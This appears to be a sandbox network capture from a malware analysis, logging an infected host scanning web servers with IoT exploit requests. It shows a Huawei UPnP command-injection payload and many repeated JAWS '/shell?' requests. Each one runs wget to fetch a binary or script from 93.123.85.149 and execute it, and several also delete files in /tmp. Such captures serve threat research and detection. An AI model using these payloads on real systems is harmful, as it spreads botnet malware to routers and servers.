                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            116192.168.2.235593013.249.180.19980
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:30.559266090 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:30.688560963 CET316INHTTP/1.1 403 Forbidden
                                                            Server: CloudFront
                                                            Date: Fri, 26 Jan 2024 14:31:30 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 151
                                                            Connection: keep-alive
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            117192.168.2.235391623.49.33.2480
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:30.578428984 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:30.727509022 CET430INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 208
                                                            Expires: Fri, 26 Jan 2024 14:31:30 GMT
                                                            Date: Fri, 26 Jan 2024 14:31:30 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 38 64 62 35 33 62 31 37 26 23 34 36 3b 31 37 30 36 32 37 39 34 39 30 26 23 34 36 3b 33 61 30 38 61 32 35 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;8db53b17&#46;1706279490&#46;3a08a25</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            118192.168.2.2352012107.170.192.17980
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:30.586906910 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:30.744292974 CET510INHTTP/1.1 400 Bad Request
                                                            Date: Fri, 26 Jan 2024 14:31:30 GMT
                                                            Server: Apache/2.4.18 (Ubuntu)
                                                            Content-Length: 316
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 72 6f 76 69 64 65 6e 63 65 66 6f 75 6e 64 61 74 69 6f 6e 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.18 (Ubuntu) Server at providencefoundation.com Port 80</address></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            119192.168.2.2338158192.185.224.21680
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:30.592293024 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:30.763746977 CET525INHTTP/1.1 400 Bad Request
                                                            Date: Fri, 26 Jan 2024 14:31:30 GMT
                                                            Server: Apache
                                                            Content-Length: 347
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><p>Additionally, a 400 Bad Requesterror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            120192.168.2.235595646.242.156.19380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:30.666539907 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:30.903335094 CET285INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:31:30 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 128
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 6f 70 73 21 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Oops! 400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            121192.168.2.2340328154.177.20.19280
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:30.679568052 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:30.936825991 CET301INHTTP/1.1 200 OK
                                                            Content-Type:text/html
                                                            Pragma:no-cache
                                                            Cache-control:no-cache, no-store, max-age=0
                                                            Transfer-Encoding:chunked
                                                            X-Frame-Options:SAMEORIGIN
                                                            Connection:Keep-Alive
                                                            X-XSS-Protection:1; mode=block
                                                            Content-Security-Policy:default-src 'self' 'unsafe-inline' 'unsafe-eval'
                                                            Jan 26, 2024 15:31:30.937215090 CET1286INData Raw: 63 62 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33
                                                            Data Ascii: cb9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=ut
                                                            Jan 26, 2024 15:31:30.937351942 CET1286INData Raw: 20 20 20 20 20 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 66 6f 72 20 28 76 61 72 20 69 20 3d 20 30 3b 20 69 20 3c 20 4c 69 73 74 2e 6c 65 6e 67 74 68 3b 20 69 2b 2b 29 0d 0a 20 20 20 20 7b 0d 0a 20 20
                                                            Data Ascii: return false; } for (var i = 0; i < List.length; i++) { if (false == IsIPv6AddressUshortValid(List[i])) { return false; } } return true; }function IsIPv
                                                            Jan 26, 2024 15:31:30.938107014 CET733INData Raw: 64 72 65 73 73 56 61 6c 69 64 28 48 6f 73 74 49 6e 66 6f 29 29 0d 0a 7b 0d 0a 2f 2a 20 68 6f 73 74 20 73 74 72 69 6e 67 20 6e 6f 74 20 69 6e 63 6c 75 64 65 20 70 6f 72 74 20 2a 2f 0d 0a 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 3d 22 68 74 74
                                                            Data Ascii: dressValid(HostInfo)){/* host string not include port */window.location="https://[" + HostInfo + "]:" + SSLPort;}else{var newipv6addr = HostInfo.substr(0,lastindex);var newipv6port = HostInfo.substr(lastindex+1);if (IsMaintWa


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            122192.168.2.235228445.143.98.8480
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:30.682024002 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:31.911366940 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:33.383179903 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:36.422996044 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:42.309946060 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:54.084286928 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:17.632986069 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            123192.168.2.234847447.107.144.24680
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:30.798057079 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:31.173810959 CET559INHTTP/1.1 301 Moved Permanently
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:31:31 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 162
                                                            Connection: keep-alive
                                                            Keep-Alive: timeout=10
                                                            Location: https://dpxc.maxmcargo.com/shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws
                                                            X-XSS-Protection: 1; mode=block
                                                            Strict-Transport-Security: max-age=15768000
                                                            X-Content-Options: nosniff
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            124192.168.2.235138413.35.2.18680
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:30.804138899 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:31.175461054 CET316INHTTP/1.1 403 Forbidden
                                                            Server: CloudFront
                                                            Date: Fri, 26 Jan 2024 14:31:30 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 151
                                                            Connection: keep-alive
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            125192.168.2.233747038.59.4.25080
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:30.832216978 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:30.998250961 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:31:30 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            126192.168.2.2337106130.237.20.5280
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:30.884005070 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:31.101500988 CET495INHTTP/1.1 400 Bad Request
                                                            Date: Fri, 26 Jan 2024 14:31:31 GMT
                                                            Server: Apache/2.4.56 (Debian)
                                                            Content-Length: 301
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 31 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.56 (Debian) Server at 127.0.1.1 Port 80</address></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            127192.168.2.2356240152.0.21.13780
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:31.568753958 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:31.711716890 CET337INHTTP/1.1 200 OK
                                                            Content-Type:text/html; charset=UTF-8
                                                            Pragma:no-cache
                                                            Cache-control:no-cache, no-store, max-age=0
                                                            Transfer-Encoding:chunked
                                                            X-Frame-Options:SAMEORIGIN
                                                            Connection:Keep-Alive
                                                            X-XSS-Protection:1; mode=block
                                                            Content-Security-Policy:default-src 'self' 'unsafe-inline' 'unsafe-eval'
                                                            Content-Language:en
                                                            Jan 26, 2024 15:31:31.712769032 CET1286INData Raw: 64 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33
                                                            Data Ascii: d36<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=ut
                                                            Jan 26, 2024 15:31:31.712785959 CET1286INData Raw: 20 3d 3d 20 27 3a 27 29 29 0d 0a 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 0d 0a 20 20 20 20 7d 20 20 20 20 0d 0a 20 20 20 20 0d 0a 20 20 20 20 4c 69 73 74 20 3d 20 41 64 64 72 65 73 73 2e 73 70 6c 69 74
                                                            Data Ascii: == ':')) { return false; } List = Address.split(":"); if (List.length > 8) { return false; } for (var i = 0; i < List.length; i++) { if (false == IsIPv6AddressUsho
